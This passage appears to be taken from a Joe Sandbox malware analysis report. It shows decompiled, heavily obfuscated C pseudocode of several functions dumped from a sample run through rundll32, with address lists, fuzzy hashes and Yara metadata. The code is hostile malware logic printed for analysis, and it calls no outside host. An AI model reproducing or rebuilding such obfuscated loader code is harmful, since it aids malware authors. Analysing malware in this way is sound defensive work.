				_v88 = _v88 + 0x9d7d;
				_v88 = _v88 / _t143;
				_v88 = _v88 ^ 0x000c7ae1;
				_v72 = 0x3c508e;
				_v72 = _v72 ^ 0xe86d4278;
				_v72 = _v72 | 0x3236ed5f;
				_v72 = _v72 ^ 0xfa734a26;
				_v52 = 0x119dd9;
				_v52 = _v52 ^ 0x40537751;
				_v52 = _v52 ^ 0x404ccff2;
				_v56 = 0x89ec9d;
				_v56 = _v56 ^ 0xd17cb195;
				_v56 = _v56 ^ 0xd1fa716b;
				do {
					while(_t126 != 0x360725a) {
						if(_t126 == 0x4bb83f6) {
							_t126 = 0x9f53cee;
							continue;
						} else {
							if(_t126 == 0x6abf560) {
								__eflags = E002CB9B1(_v88, _v72, __eflags, _t140 + 4, _v52,  &_v48, _v56);
								_t141 =  !=  ? 1 : _t141;
							} else {
								if(_t126 != 0x9f53cee) {
									goto L10;
								} else {
									E002C64C5(_v92, _v68, _v96, _v84, _t124,  &_v48);
									_t146 =  &(_t146[4]);
									_t126 = 0x360725a;
									continue;
								}
							}
						}
						L13:
						return _t141;
					}
					_t117 = E002BB09F(_v60, _v76,  &_v48, _v80, _t140, _v64);
					_t146 =  &(_t146[4]);
					__eflags = _t117;
					if(__eflags == 0) {
						_t126 = 0x3e1d0be;
						goto L10;
					} else {
						_t126 = 0x6abf560;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t126 - 0x3e1d0be;
				} while (__eflags != 0);
				goto L13;
			}
























                                                                                                                      0x002c0272
                                                                                                                      0x002c0276
                                                                                                                      0x002c027a
                                                                                                                      0x002c027c
                                                                                                                      0x002c0280
                                                                                                                      0x002c0281
                                                                                                                      0x002c0282
                                                                                                                      0x002c0283
                                                                                                                      0x002c0288
                                                                                                                      0x002c0290
                                                                                                                      0x002c0293
                                                                                                                      0x002c029f
                                                                                                                      0x002c02a1
                                                                                                                      0x002c02a8
                                                                                                                      0x002c02ab
                                                                                                                      0x002c02af
                                                                                                                      0x002c02b7
                                                                                                                      0x002c02bf
                                                                                                                      0x002c02c7
                                                                                                                      0x002c02cf
                                                                                                                      0x002c02d7
                                                                                                                      0x002c02df
                                                                                                                      0x002c02e7
                                                                                                                      0x002c02ef
                                                                                                                      0x002c02f4
                                                                                                                      0x002c02fc
                                                                                                                      0x002c0304
                                                                                                                      0x002c0311
                                                                                                                      0x002c0315
                                                                                                                      0x002c031d
                                                                                                                      0x002c0325
                                                                                                                      0x002c032d
                                                                                                                      0x002c0335
                                                                                                                      0x002c033d
                                                                                                                      0x002c0345
                                                                                                                      0x002c034a
                                                                                                                      0x002c0352
                                                                                                                      0x002c035a
                                                                                                                      0x002c0362
                                                                                                                      0x002c0367
                                                                                                                      0x002c036f
                                                                                                                      0x002c037c
                                                                                                                      0x002c037d
                                                                                                                      0x002c0381
                                                                                                                      0x002c0389
                                                                                                                      0x002c0391
                                                                                                                      0x002c0399
                                                                                                                      0x002c03ac
                                                                                                                      0x002c03b0
                                                                                                                      0x002c03b8
                                                                                                                      0x002c03c0
                                                                                                                      0x002c03c8
                                                                                                                      0x002c03d0
                                                                                                                      0x002c03d8
                                                                                                                      0x002c03e0
                                                                                                                      0x002c03e8
                                                                                                                      0x002c03f0
                                                                                                                      0x002c03f8
                                                                                                                      0x002c0400
                                                                                                                      0x002c0408
                                                                                                                      0x002c0408
                                                                                                                      0x002c0416
                                                                                                                      0x002c0449
                                                                                                                      0x00000000
                                                                                                                      0x002c0418
                                                                                                                      0x002c041a
                                                                                                                      0x002c04a9
                                                                                                                      0x002c04ab
                                                                                                                      0x002c041c
                                                                                                                      0x002c0422
                                                                                                                      0x00000000
                                                                                                                      0x002c0424
                                                                                                                      0x002c043a
                                                                                                                      0x002c043f
                                                                                                                      0x002c0442
                                                                                                                      0x00000000
                                                                                                                      0x002c0442
                                                                                                                      0x002c0422
                                                                                                                      0x002c041a
                                                                                                                      0x002c04af
                                                                                                                      0x002c04b7
                                                                                                                      0x002c04b7
                                                                                                                      0x002c0466
                                                                                                                      0x002c046b
                                                                                                                      0x002c046e
                                                                                                                      0x002c0470
                                                                                                                      0x002c0476
                                                                                                                      0x00000000
                                                                                                                      0x002c0472
                                                                                                                      0x002c0472
                                                                                                                      0x00000000
                                                                                                                      0x002c0472
                                                                                                                      0x00000000
                                                                                                                      0x002c047b
                                                                                                                      0x002c047b
                                                                                                                      0x002c047b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G3$QwS@$_62
                                                                                                                      • API String ID: 0-451131340
                                                                                                                      • Opcode ID: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction ID: f6922792759cd4d6987aefe2bbf9276fba7400ada985c9385d4a1f281e4fc5e8
                                                                                                                      • Opcode Fuzzy Hash: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction Fuzzy Hash: 475184711183459FC398DF20C58A82BBBE1FBC4798F500A1DF692A2221D3B1DA588B83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C3D41 Relevance: 3.9, Strings: 3, Instructions: 127COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002C3D41(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t102;
				void* _t110;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t132;
				signed int _t133;
				signed int* _t136;

				_t131 = _a8;
				_t117 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t102);
				_v64 = 0x9e44de;
				_t136 =  &(( &_v100)[4]);
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x000cb772;
				_t132 = 0;
				_v84 = 0x342048;
				_t119 = 0x9e632dd;
				_v84 = _v84 << 2;
				_t133 = 0x77;
				_v84 = _v84 / _t133;
				_v84 = _v84 ^ 0x00050c4a;
				_v68 = 0xcb0a16;
				_v68 = _v68 * 0x2c;
				_v68 = _v68 ^ 0x22ee5bf9;
				_v88 = 0x6d370;
				_v88 = _v88 << 2;
				_v88 = _v88 + 0xffff4ba7;
				_v88 = _v88 ^ 0x0017e1fc;
				_v96 = 0xa9311c;
				_v96 = _v96 + 0x677e;
				_v96 = _v96 << 6;
				_v96 = _v96 >> 1;
				_v96 = _v96 ^ 0x1536caa9;
				_v92 = 0x3ec146;
				_v92 = _v92 >> 1;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x01fa5034;
				_v100 = 0xc8b468;
				_v100 = _v100 + 0xabff;
				_v100 = _v100 + 0x496c;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x064ce6e5;
				_v72 = 0x40c3e5;
				_v72 = _v72 + 0xe4b1;
				_v72 = _v72 ^ 0x00481562;
				_v76 = 0xf7b9fc;
				_v76 = _v76 ^ 0x04753abe;
				_v76 = _v76 >> 8;
				_v76 = _v76 ^ 0x00058483;
				_v56 = 0xab3e00;
				_v56 = _v56 * 0x42;
				_v56 = _v56 ^ 0x2c2f6e9b;
				_v80 = 0x8577d2;
				_v80 = _v80 | 0xb985653c;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5dfa230b;
				_v60 = 0xdce2c4;
				_v60 = _v60 | 0x5395b845;
				_v60 = _v60 ^ 0x53d3ec0c;
				while(_t119 != 0x979dba8) {
					if(_t119 == 0x9e632dd) {
						_t119 = 0xa2b72cf;
						continue;
					} else {
						if(_t119 == 0xa2b72cf) {
							E002C64C5(_v64, _v84, _v68, _v88, _t117,  &_v52);
							_t136 =  &(_t136[4]);
							_t119 = 0xe5d0333;
							continue;
						} else {
							if(_t119 != 0xe5d0333) {
								L10:
								__eflags = _t119 - 0xfc63b9d;
								if(__eflags != 0) {
									continue;
								}
							} else {
								_t115 = E002BB09F(_v96, _v92,  &_v52, _v100, _t131 + 0xc, _v72);
								_t136 =  &(_t136[4]);
								if(_t115 != 0) {
									_t119 = 0x979dba8;
									continue;
								}
							}
						}
					}
					return _t132;
				}
				_t110 = E002CB9B1(_v76, _v56, __eflags, _t131 + 0x10, _v80,  &_v52, _v60);
				_t136 =  &(_t136[4]);
				__eflags = _t110;
				_t132 =  !=  ? 1 : _t132;
				_t119 = 0xfc63b9d;
				goto L10;
			}
























                                                                                                                      0x002c3d48
                                                                                                                      0x002c3d4c
                                                                                                                      0x002c3d4e
                                                                                                                      0x002c3d4f
                                                                                                                      0x002c3d53
                                                                                                                      0x002c3d54
                                                                                                                      0x002c3d55
                                                                                                                      0x002c3d5a
                                                                                                                      0x002c3d62
                                                                                                                      0x002c3d65
                                                                                                                      0x002c3d6c
                                                                                                                      0x002c3d74
                                                                                                                      0x002c3d76
                                                                                                                      0x002c3d7e
                                                                                                                      0x002c3d83
                                                                                                                      0x002c3d8e
                                                                                                                      0x002c3d96
                                                                                                                      0x002c3d9a
                                                                                                                      0x002c3da2
                                                                                                                      0x002c3daf
                                                                                                                      0x002c3db3
                                                                                                                      0x002c3dbb
                                                                                                                      0x002c3dc3
                                                                                                                      0x002c3dc8
                                                                                                                      0x002c3dd0
                                                                                                                      0x002c3dd8
                                                                                                                      0x002c3de0
                                                                                                                      0x002c3de8
                                                                                                                      0x002c3ded
                                                                                                                      0x002c3df1
                                                                                                                      0x002c3df9
                                                                                                                      0x002c3e01
                                                                                                                      0x002c3e05
                                                                                                                      0x002c3e0a
                                                                                                                      0x002c3e12
                                                                                                                      0x002c3e1a
                                                                                                                      0x002c3e22
                                                                                                                      0x002c3e2a
                                                                                                                      0x002c3e2f
                                                                                                                      0x002c3e37
                                                                                                                      0x002c3e3f
                                                                                                                      0x002c3e47
                                                                                                                      0x002c3e4f
                                                                                                                      0x002c3e57
                                                                                                                      0x002c3e5f
                                                                                                                      0x002c3e64
                                                                                                                      0x002c3e6c
                                                                                                                      0x002c3e79
                                                                                                                      0x002c3e7d
                                                                                                                      0x002c3e85
                                                                                                                      0x002c3e8d
                                                                                                                      0x002c3e95
                                                                                                                      0x002c3e9a
                                                                                                                      0x002c3ea2
                                                                                                                      0x002c3eaa
                                                                                                                      0x002c3eb2
                                                                                                                      0x002c3eba
                                                                                                                      0x002c3ec4
                                                                                                                      0x002c3f28
                                                                                                                      0x00000000
                                                                                                                      0x002c3ec6
                                                                                                                      0x002c3ecc
                                                                                                                      0x002c3f19
                                                                                                                      0x002c3f1e
                                                                                                                      0x002c3f21
                                                                                                                      0x00000000
                                                                                                                      0x002c3ece
                                                                                                                      0x002c3ed4
                                                                                                                      0x002c3f5d
                                                                                                                      0x002c3f5d
                                                                                                                      0x002c3f63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c3eda
                                                                                                                      0x002c3ef3
                                                                                                                      0x002c3ef8
                                                                                                                      0x002c3efd
                                                                                                                      0x002c3eff
                                                                                                                      0x00000000
                                                                                                                      0x002c3eff
                                                                                                                      0x002c3efd
                                                                                                                      0x002c3ed4
                                                                                                                      0x002c3ecc
                                                                                                                      0x002c3f72
                                                                                                                      0x002c3f72
                                                                                                                      0x002c3f48
                                                                                                                      0x002c3f4f
                                                                                                                      0x002c3f53
                                                                                                                      0x002c3f55
                                                                                                                      0x002c3f58
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H 4$lI$~g
                                                                                                                      • API String ID: 0-1574228674
                                                                                                                      • Opcode ID: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction ID: da3454f49b3f7308e5f61db83e9e0b02070a0915c59fc7733673cb7e8e4829ee
                                                                                                                      • Opcode Fuzzy Hash: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction Fuzzy Hash: 185143B15183419FC758CF25888982BBBF5FBD8748F408E1DF99696260C3B1CA19CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B6A1F Relevance: 3.9, Strings: 3, Instructions: 126COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002B6A1F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t133;
				void* _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				intOrPtr _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				void* _t161;

				_t158 =  *0x2d5c94; // 0x0
				_v8 = 0x584755;
				_t137 = __ecx;
				_t2 =  &_v8; // 0x584755
				_t159 = _t158 + 0x230;
				_t139 = 0x64;
				_v8 =  *_t2 * 0x67;
				_v8 = _v8 + 0xffff4b67;
				_v8 = _v8 ^ 0xe76daef6;
				_v8 = _v8 ^ 0xc4ee506c;
				_v28 = 0x9e8b87;
				_v28 = _v28 + 0x75d;
				_v28 = _v28 / _t139;
				_v28 = _v28 ^ 0x00079f8c;
				_v24 = 0xc311ab;
				_v24 = _v24 + 0xffffbeea;
				_v24 = _v24 | 0xf92f35a0;
				_v24 = _v24 ^ 0xf9e35170;
				_v44 = 0x977698;
				_v44 = _v44 + 0x51f5;
				_v44 = _v44 ^ 0x0096f96a;
				_v32 = 0xe7cab8;
				_v32 = _v32 | 0xaa1208f4;
				_t140 = 0x17;
				_v32 = _v32 / _t140;
				_v32 = _v32 ^ 0x076e046c;
				_v12 = 0x2eec3f;
				_v12 = _v12 + 0xffffb819;
				_v12 = _v12 + 0xffff37c9;
				_t141 = 0x68;
				_v12 = _v12 / _t141;
				_v12 = _v12 ^ 0x000eef91;
				_v56 = 0x530307;
				_v56 = _v56 | 0x0fbda9c8;
				_v56 = _v56 ^ 0x0ffdd502;
				_v52 = 0x5d35c5;
				_v52 = _v52 + 0xd27c;
				_v52 = _v52 ^ 0x0055f8de;
				_v48 = 0x6ef6d5;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x0035703d;
				_v16 = 0x82f5d;
				_v16 = _v16 << 0xd;
				_v16 = _v16 + 0xa18d;
				_v16 = _v16 + 0xffffcd20;
				_v16 = _v16 ^ 0x05eb1b3e;
				_v20 = 0xcf26b;
				_v20 = _v20 | 0xbebffeb7;
				_v20 = _v20 ^ 0xbebf7f31;
				_v60 = 0x60d0b7;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0017c790;
				_v40 = 0xb2c22;
				_v40 = _v40 ^ 0x2c2f8cde;
				_v40 = _v40 + 0xffffbcf4;
				_v40 = _v40 ^ 0x2c2f98f1;
				_v36 = 0x14b711;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 | 0x6b3fd2c1;
				_v36 = _v36 ^ 0x6b3a1312;
				while(1) {
					_t160 =  *_t159;
					if(_t160 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t160 + 0x30)) == 0) {
						L4:
						 *_t159 =  *_t160;
						_t133 = E002B68DE(_v20, _v60, _v40, _v36, _t160);
						_t161 = _t161 + 0xc;
					} else {
						_t133 = E002B5E0B( *((intOrPtr*)(_t160 + 0x24)), _t137, _v28, _v24);
						if(_t133 != _v8) {
							_t159 = _t160;
						} else {
							 *((intOrPtr*)(_t160 + 0xc))( *((intOrPtr*)(_t160 + 0x30)), 0, 0);
							E002BF88A(_v44, _v32, _v12,  *((intOrPtr*)(_t160 + 0x30)));
							E002C4DAD(_v56, _v52,  *((intOrPtr*)(_t160 + 0x24)), _v48, _v16);
							_t161 = _t161 + 0x14;
							goto L4;
						}
					}
				}
				return _t133;
			}


























                                                                                                                      0x002b6a28
                                                                                                                      0x002b6a30
                                                                                                                      0x002b6a37
                                                                                                                      0x002b6a39
                                                                                                                      0x002b6a3d
                                                                                                                      0x002b6a45
                                                                                                                      0x002b6a48
                                                                                                                      0x002b6a4b
                                                                                                                      0x002b6a52
                                                                                                                      0x002b6a59
                                                                                                                      0x002b6a60
                                                                                                                      0x002b6a67
                                                                                                                      0x002b6a75
                                                                                                                      0x002b6a78
                                                                                                                      0x002b6a7f
                                                                                                                      0x002b6a86
                                                                                                                      0x002b6a8d
                                                                                                                      0x002b6a94
                                                                                                                      0x002b6a9b
                                                                                                                      0x002b6aa2
                                                                                                                      0x002b6aa9
                                                                                                                      0x002b6ab0
                                                                                                                      0x002b6ab7
                                                                                                                      0x002b6ac1
                                                                                                                      0x002b6ac6
                                                                                                                      0x002b6acb
                                                                                                                      0x002b6ad2
                                                                                                                      0x002b6ad9
                                                                                                                      0x002b6ae0
                                                                                                                      0x002b6aea
                                                                                                                      0x002b6aed
                                                                                                                      0x002b6af0
                                                                                                                      0x002b6af7
                                                                                                                      0x002b6afe
                                                                                                                      0x002b6b05
                                                                                                                      0x002b6b0c
                                                                                                                      0x002b6b13
                                                                                                                      0x002b6b1a
                                                                                                                      0x002b6b21
                                                                                                                      0x002b6b28
                                                                                                                      0x002b6b2b
                                                                                                                      0x002b6b32
                                                                                                                      0x002b6b39
                                                                                                                      0x002b6b3d
                                                                                                                      0x002b6b44
                                                                                                                      0x002b6b4b
                                                                                                                      0x002b6b52
                                                                                                                      0x002b6b59
                                                                                                                      0x002b6b60
                                                                                                                      0x002b6b67
                                                                                                                      0x002b6b6e
                                                                                                                      0x002b6b72
                                                                                                                      0x002b6b79
                                                                                                                      0x002b6b80
                                                                                                                      0x002b6b87
                                                                                                                      0x002b6b8e
                                                                                                                      0x002b6b95
                                                                                                                      0x002b6b9c
                                                                                                                      0x002b6ba0
                                                                                                                      0x002b6ba7
                                                                                                                      0x002b6c18
                                                                                                                      0x002b6c18
                                                                                                                      0x002b6c1c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b6bb4
                                                                                                                      0x002b6bff
                                                                                                                      0x002b6c05
                                                                                                                      0x002b6c10
                                                                                                                      0x002b6c15
                                                                                                                      0x002b6bb6
                                                                                                                      0x002b6bc1
                                                                                                                      0x002b6bcb
                                                                                                                      0x002b6c25
                                                                                                                      0x002b6bcd
                                                                                                                      0x002b6bd4
                                                                                                                      0x002b6be3
                                                                                                                      0x002b6bf7
                                                                                                                      0x002b6bfc
                                                                                                                      0x00000000
                                                                                                                      0x002b6bfc
                                                                                                                      0x002b6bcb
                                                                                                                      0x002b6bb4
                                                                                                                      0x002b6c24

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =p5$?.$UGX
                                                                                                                      • API String ID: 0-1320111276
                                                                                                                      • Opcode ID: 4d29e631e8c925ebd7d64bdd655efb1fa7d93b720f8ce557a652a7ac694f019a
                                                                                                                      • Instruction ID: 4a836b1e679d167fcbe8e74f3c6f1da01387d57b05313af6b60afa701453c014
                                                                                                                      • Opcode Fuzzy Hash: 4d29e631e8c925ebd7d64bdd655efb1fa7d93b720f8ce557a652a7ac694f019a
                                                                                                                      • Instruction Fuzzy Hash: 2F512F72D01309EBCB54CFA4D98A9DEBFB2FF48328F208159D502B6260D3B51A55CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BC850 Relevance: 3.9, Strings: 3, Instructions: 125COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002BC850(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v328;
				char _t126;
				void* _t128;
				signed int _t129;
				void* _t133;
				signed int _t135;
				signed int _t136;
				char* _t137;
				intOrPtr* _t154;

				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v68 = 0xeb7817;
				_v44 = 0x4dbb17;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000af917;
				_v12 = 0xca90c;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 | 0x67e1d035;
				_v12 = _v12 ^ 0x67ebacbe;
				_v32 = 0xdd0ad5;
				_v32 = _v32 >> 6;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x00040440;
				_v16 = 0xaefc2a;
				_v16 = _v16 ^ 0x05a88ae0;
				_t154 = __ecx;
				_t135 = 0x4a;
				_v16 = _v16 / _t135;
				_v16 = _v16 | 0x6472a2d9;
				_v16 = _v16 ^ 0x647c73c3;
				_v8 = 0x7aea22;
				_t136 = 0x5f;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x0003680c;
				_v28 = 0xd7a14b;
				_v28 = _v28 >> 1;
				_v28 = _v28 | 0x0e275eed;
				_v28 = _v28 ^ 0x0e6be1b9;
				_v56 = 0x693eb0;
				_t137 =  &_v328;
				_v56 = _v56 / _t136;
				_v56 = _v56 ^ 0x00052716;
				_v52 = 0x6599ea;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x659cef3f;
				_v36 = 0xaf3092;
				_v36 = _v36 + 0xffffd3bf;
				_v36 = _v36 ^ 0x419856f6;
				_v36 = _v36 ^ 0x413f6f4c;
				_v40 = 0x56314e;
				_v40 = _v40 ^ 0x0d0339a4;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x0068e9be;
				_v20 = 0xd689b7;
				_v20 = _v20 >> 1;
				_v20 = _v20 + 0x3668;
				_v20 = _v20 ^ 0x006dcd8c;
				_v24 = 0x36edf6;
				_v24 = _v24 + 0x231d;
				_v24 = _v24 ^ 0xb40b6ffd;
				_v24 = _v24 ^ 0xb434c03a;
				_v48 = 0x867594;
				_v48 = _v48 * 0x3a;
				_v48 = _v48 ^ 0x1e7cd6f5;
				while(1) {
					_t126 =  *_t154;
					if(_t126 == 0) {
						break;
					}
					if(_t126 == 0x2e) {
						 *_t137 = 0;
					} else {
						 *_t137 = _t126;
						_t137 = _t137 + 1;
						_t154 = _t154 + 1;
						continue;
					}
					L6:
					_t128 = E002C59B7(_v44, _v12,  &_v328, _v32);
					_t155 = _t128;
					if(_t128 != 0) {
						L8:
						_t129 = E002CFE5E(_v56, _t154 + 1, _v52, _v36);
						_push(_v48);
						_push(_v24);
						_push(_v20);
						_push(_v40);
						return E002BF2C1(_t155, _t129 ^ 0x3e95e426);
					}
					_t133 = E002CF949(_v16, _v8,  &_v328, _v28);
					_t155 = _t133;
					if(_t133 != 0) {
						goto L8;
					}
					return _t133;
				}
				goto L6;
			}




























                                                                                                                      0x002bc859
                                                                                                                      0x002bc85f
                                                                                                                      0x002bc863
                                                                                                                      0x002bc86a
                                                                                                                      0x002bc871
                                                                                                                      0x002bc875
                                                                                                                      0x002bc87c
                                                                                                                      0x002bc883
                                                                                                                      0x002bc887
                                                                                                                      0x002bc88b
                                                                                                                      0x002bc892
                                                                                                                      0x002bc899
                                                                                                                      0x002bc8a0
                                                                                                                      0x002bc8a4
                                                                                                                      0x002bc8a8
                                                                                                                      0x002bc8af
                                                                                                                      0x002bc8b6
                                                                                                                      0x002bc8c4
                                                                                                                      0x002bc8c6
                                                                                                                      0x002bc8cb
                                                                                                                      0x002bc8d0
                                                                                                                      0x002bc8d7
                                                                                                                      0x002bc8de
                                                                                                                      0x002bc8e9
                                                                                                                      0x002bc8ea
                                                                                                                      0x002bc8ed
                                                                                                                      0x002bc8f1
                                                                                                                      0x002bc8f5
                                                                                                                      0x002bc8fc
                                                                                                                      0x002bc903
                                                                                                                      0x002bc906
                                                                                                                      0x002bc90d
                                                                                                                      0x002bc914
                                                                                                                      0x002bc920
                                                                                                                      0x002bc926
                                                                                                                      0x002bc929
                                                                                                                      0x002bc930
                                                                                                                      0x002bc937
                                                                                                                      0x002bc93b
                                                                                                                      0x002bc942
                                                                                                                      0x002bc949
                                                                                                                      0x002bc950
                                                                                                                      0x002bc957
                                                                                                                      0x002bc95e
                                                                                                                      0x002bc965
                                                                                                                      0x002bc96c
                                                                                                                      0x002bc970
                                                                                                                      0x002bc977
                                                                                                                      0x002bc97e
                                                                                                                      0x002bc981
                                                                                                                      0x002bc988
                                                                                                                      0x002bc98f
                                                                                                                      0x002bc996
                                                                                                                      0x002bc99d
                                                                                                                      0x002bc9a4
                                                                                                                      0x002bc9ab
                                                                                                                      0x002bc9b6
                                                                                                                      0x002bc9b9
                                                                                                                      0x002bc9ca
                                                                                                                      0x002bc9ca
                                                                                                                      0x002bc9ce
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bc9c4
                                                                                                                      0x002bc9d2
                                                                                                                      0x002bc9c6
                                                                                                                      0x002bc9c6
                                                                                                                      0x002bc9c8
                                                                                                                      0x002bc9c9
                                                                                                                      0x00000000
                                                                                                                      0x002bc9c9
                                                                                                                      0x002bc9d5
                                                                                                                      0x002bc9e5
                                                                                                                      0x002bc9ea
                                                                                                                      0x002bc9f0
                                                                                                                      0x002bca0f
                                                                                                                      0x002bca1b
                                                                                                                      0x002bca20
                                                                                                                      0x002bca2a
                                                                                                                      0x002bca2f
                                                                                                                      0x002bca32
                                                                                                                      0x00000000
                                                                                                                      0x002bca3a
                                                                                                                      0x002bca02
                                                                                                                      0x002bca07
                                                                                                                      0x002bca0d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bca42
                                                                                                                      0x002bca42
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "z$Lo?A$N1V
                                                                                                                      • API String ID: 0-1513724126
                                                                                                                      • Opcode ID: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction ID: f15ce37537d82f5b0f91f4242a758a0c60b474a5e20f16a69c3e10ff7bd9ce29
                                                                                                                      • Opcode Fuzzy Hash: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction Fuzzy Hash: 4B514332C0121EEBCF09CFA5D94AAEEFBB1FB44318F208199D411B6260D7B50A19CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BB821 Relevance: 3.9, Strings: 3, Instructions: 122COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E002BB821() {
				signed int _v4;
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t108;
				intOrPtr _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				intOrPtr* _t116;
				void* _t117;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v40;
				_v8 = 0x113b84;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x00044f92;
				_v36 = 0x188bc5;
